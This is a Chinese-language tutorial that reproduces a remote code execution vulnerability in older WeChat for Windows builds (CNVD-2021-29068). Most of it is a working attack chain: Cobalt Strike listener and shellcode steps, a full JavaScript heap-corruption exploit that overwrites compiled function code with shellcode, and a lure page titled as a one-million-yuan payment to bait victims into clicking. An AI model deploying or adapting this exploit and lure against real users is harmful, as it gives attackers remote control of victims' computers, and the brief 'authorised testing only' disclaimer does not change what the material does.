
微信windows版存在远程代码执行漏洞

CNVD 编号：CNVD-2021-29068
影响产品：深圳市腾讯计算机系统有限公司 微信 Windows 版 < 3.2.1.141
防护措施：
1. 升级到微信 Windows 版 3.2.1.141 或更高版本（该版本起已修复）
2. 不随意点击来源不明的链接，尤其是直接在微信内打开的网页
3. 复现所用工具：Cobalt Strike（懂的都懂）、下文的 js 脚本和 html 页面。注意：以下内容仅用于授权的安全测试与学习，切勿对未授权目标使用。下面开始。


一、Cobalt Strike 服务端的搭建这里不再赘述。打开 Cobalt Strike，创建一个监听器（Listener），后面生成的 payload 会回连到这个监听器。
vx0day-1

二、基于该监听器生成 payload，输出格式选择 C，得到以 .c 为后缀的文件（其中的 shellcode 是 `\x..` 转义形式的 C 字符串）。
vx0day-2

三、打开生成的 payload 文件，把其中的 `\x` 全部替换为 `,0x`（原文此处的字符在排版时丢失），这样 C 字符串形式的 shellcode 就变成了 js 数组所需的 `0x..,0x..` 形式；注意删掉替换后开头多出来的那个逗号，否则数组第一个元素会是空位。
vx0day-3

四、js 代码如下↓
注意：网页排版会把代码中的引号、减号和省略号替换成中文/全角符号（例如 ‘ ’ “ ” – …），直接复制会导致语法错误，使用前请逐一替换为 ASCII 的 ' " - ...。另外记得把第三步得到的 shellcode 字节数组粘贴到 `var shellcode = [...]` 中。
// Implicit globals carried over from the original proof-of-concept; neither
// is read anywhere in this script (print() below is an empty stub).
ENABLE_LOG = true;

IN_WORKER = true;

// The original PoC comment here read "run calc and hang in a loop"; in this
// variant the array holds the raw shellcode bytes that trigger() copies over
// the code address it reads from target_function's function object.
// The bracket contents are a placeholder, not valid JavaScript: paste the
// comma-separated 0x.. byte list produced in step 3 (no leading comma).
var shellcode = [HI!粘贴我到这里];

// Deliberate no-op. The PoC calls print() for progress and error messages,
// but this variant discards them all (presumably there is no console to
// read inside the target web view), so failures are silent.
function print(data) {
  void data;
}

// Global counter mutated by target_function; the arithmetic below has no
// purpose other than giving the function a non-trivial body.
var not_optimised_out = 0;

// The function whose machine code trigger() later overwrites with the
// shellcode. 0xdecaf0 is never passed (the warm-up loop stops at 0xffff and
// the final call in trigger() uses 0), so that branch is dead code.
var target_function = (function (value) {
  if (value == 0xdecaf0) {
    not_optimised_out += 1;
  }
  not_optimised_out += 1;
  not_optimised_out |= 0xff;
  not_optimised_out *= 12;
});

// Warm-up: call target_function 0x10000 times before the exploit runs,
// presumably so the engine compiles it to native code whose address
// trigger() can then read out of the function object and patch.
for (var i = 0; i < 0x10000; ++i) {
  target_function(i);
}

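// Shared state for the corruption step.
// g_array is created by cb() as a length-1 array and is then written at
// index 8 inside DerivedBase's constructor in oobAccess().
var g_array;

// Sizes for the eval-built class chain in oobAccess(): how many dead
// `this.a=0;` statements pad each constructor and how deep the chain is.
// Presumably tuned to the target engine's heap layout -- treat as magic.
// (The minus sign was an en dash in the published listing, which is a
// syntax error in JavaScript.)
var tDerivedNCount = 17 * 87481 - 8;

var tDerivedNDepth = 19 * 19;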

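// Callback installed as the `toString` of the pattern object handed to the
// RegExp constructor inside DerivedBase (oobAccess). When the engine
// invokes it as toString it receives no argument, so flag is undefined,
// the early return is skipped, and g_array is (re)created with a single
// element. cb(true) is called once beforehand purely for the early-return
// path. Returns the pattern string 'c01db33f' in the fall-through case.
// (The string quotes were curly quotes in the published listing.)
function cb(flag) {
  if (flag == true) {
    return;
  }
  g_array = new Array(0);
  g_array[0] = 0x1dbabe * 2;
  return 'c01db33f';
}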

// Allocation churn: create 0x10000 short-lived String wrapper objects and
// drop them immediately. Only the allocation pressure matters here; the
// objects themselves are never used.
function gc() {
  let remaining = 0x10000;
  while (remaining-- > 0) {
    new String();
  }
}

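// Builds the memory-access primitives used by trigger(). It is called as a
// plain function, so `this` is the global object and the primitives end up
// as globals (buffer, buffer_view, page_buffer, page_view, leakPtr, setPtr,
// read32, write32, write8, setBytes); the same object is also returned.
//
// Depends on the sibling globals cb(), gc(), g_array, tDerivedNCount and
// tDerivedNDepth. The allocation order below is deliberate -- the original
// author's comments describe which allocation is meant to land next to
// which -- so statements must not be reordered.
//
// All pointers are read and written as 32-bit values (getUint32/setUint32),
// so this only fits a 32-bit process.
//
// The only code changes versus the published listing are typographic: the
// `...` spread operators were a single ellipsis character and the string
// quotes were curly quotes, both of which are syntax errors in JavaScript.
function oobAccess() {
  var this_ = this;

  this.buffer = null;
  this.buffer_view = null;
  this.page_buffer = null;
  this.page_view = null;
  // Spread as trailing arguments into the DataView calls below. It is
  // always empty; presumably it only exists to keep those calls from being
  // optimised in a way that would break the primitives.
  this.prevent_opt = [];

  // Byte offsets, relative to the corrupted `buffer`, of page_buffer's
  // `slot` property and of its backing-store pointer. Engine- and
  // build-specific magic values.
  var kSlotOffset = 0x1f;
  var kBackingStoreOffset = 0xf;

  // ArrayBuffer subclass with one extra property that initially points to
  // itself. leakPtr() later stores an arbitrary object in `slot` and reads
  // the raw pointer back through buffer_view.
  class LeakArrayBuffer extends ArrayBuffer {
    constructor() {
      super(0x1000);
      this.slot = this;
    }
  }

  this.page_buffer = new LeakArrayBuffer();
  this.page_view = new DataView(this.page_buffer);

  // Exercise the RegExp constructor once with an object whose toString is
  // consulted for the pattern, and run cb() once along its early-return
  // path, before the real attempt below.
  new RegExp({ toString: function () { return 'a' } });
  cb(true);

  class DerivedBase extends RegExp {
    constructor() {
      // var array = null;
      super(
        // at this point, the 4-byte allocation for the JSRegExp this object
        // has just happened.
        {
          toString: cb
        }, 'g'
        // now the runtime JSRegExp constructor is called, corrupting the
        // JSArray.
      );
      // this allocation will now directly follow the FixedArray allocation
      // made for this.data, which is where array.elements points to.
      this_.buffer = new ArrayBuffer(0x80);
      // Under normal semantics this just extends the length-1 array cb()
      // created; the exploit relies on g_array having been corrupted first.
      g_array[8] = this_.page_buffer;
    }
  }

  // Builds a chain of tDerivedNDepth subclasses ending in DerivedBase. Each
  // constructor returns right after super(); the repeated `this.a=0;`
  // statements after the return are unreachable and only pad the size of
  // each constructor's source.
  var derived_n = eval(`(function derived_n(i) {
    if (i == 0) {
      return DerivedBase;
    }
    class DerivedN extends derived_n(i-1) {
      constructor() {
        super();
        return;
        ${"this.a=0;".repeat(tDerivedNCount)}
      }
    }
    return DerivedN;
  })`);

  gc();
  new (derived_n(tDerivedNDepth))();

  // From here on `buffer` is assumed to overlap page_buffer's object header,
  // so writes through buffer_view change where page_view points.
  this.buffer_view = new DataView(this.buffer);

  // Leak the address of an arbitrary object: park it in page_buffer.slot
  // and read the 32-bit field back through the overlapping view.
  this.leakPtr = function (obj) {
    this.page_buffer.slot = obj;
    return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
  }

  // Retarget page_buffer's backing store at addr.
  this.setPtr = function (addr) {
    this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
  }

  // Arbitrary 32-bit read at addr.
  this.read32 = function (addr) {
    this.setPtr(addr);
    return this.page_view.getUint32(0, true, ...this.prevent_opt);
  }

  // Arbitrary 32-bit write at addr.
  this.write32 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint32(0, value, true, ...this.prevent_opt);
  }

  // Arbitrary byte write at addr.
  this.write8 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint8(0, value, ...this.prevent_opt);
  }

  // Copy `content` (an array of byte values) to addr one byte at a time.
  // No bounds check of any kind: it writes content.length bytes wherever
  // addr points.
  this.setBytes = function (addr, content) {
    for (var i = 0; i < content.length; i++) {
      this.write8(addr + i, content[i]);
    }
  }

  return this;
}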

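// End-to-end chain: build the primitives, leak target_function's address,
// read the pointer stored 0x1b bytes into that function object (presumably
// its code entry), overwrite the memory it points to with `shellcode`, then
// call target_function so the overwritten code executes.
// Uses the globals oobAccess, target_function, shellcode and print.
// (The string quotes were curly quotes in the published listing.)
function trigger() {
  var oob = oobAccess();

  var func_ptr = oob.leakPtr(target_function);
  print('[*] target_function at 0x' + func_ptr.toString(16));

  // Offset of the pointer read out of the function object; engine- and
  // build-specific, like the offsets inside oobAccess().
  var kCodeInsOffset = 0x1b;
  var code_addr = oob.read32(func_ptr + kCodeInsOffset);
  print('[*] code_addr at 0x' + code_addr.toString(16));

  // Writes shellcode.length bytes at code_addr with no bounds check.
  oob.setBytes(code_addr, shellcode);

  target_function(0);
}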

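// Entry point. Any exception thrown by the chain is caught and handed to
// print(), which in this variant discards it, so a failed attempt leaves no
// visible trace in the page.
// (The string quotes were curly quotes in the published listing.)
try {
  print("start running");
  trigger();
} catch (e) {
  print(e);
}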
vx0day-4

五、把 js 文件的全部内容粘贴到下面 html 的 <script> 标签内（替换其中的占位文字），再放到 web 服务器上，方便通过链接访问。
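<head>
  <!-- Minimal lure page: its only purpose is to run the script below when
       the link is opened (presumably in WeChat's built-in browser). The
       attribute quotes were curly quotes in the published listing. -->
  <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
</head>

<h1>微信到账一百万元</h1>

<script>
  // Placeholder text: replace the three lines below with the full contents
  // of the js file from step 4 (shellcode array already filled in).
  我要js代码

  我要js代码

  我要js代码
</script>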
六、现在可以把 html 链接发给测试对象了（仅限授权的测试环境——这里俺就用我女朋友的微信作为实验对象）。
vx0day-5

七、受害者在微信中点击链接后，Cobalt Strike 的监听器即收到回连，目标上线！
vx0day-6



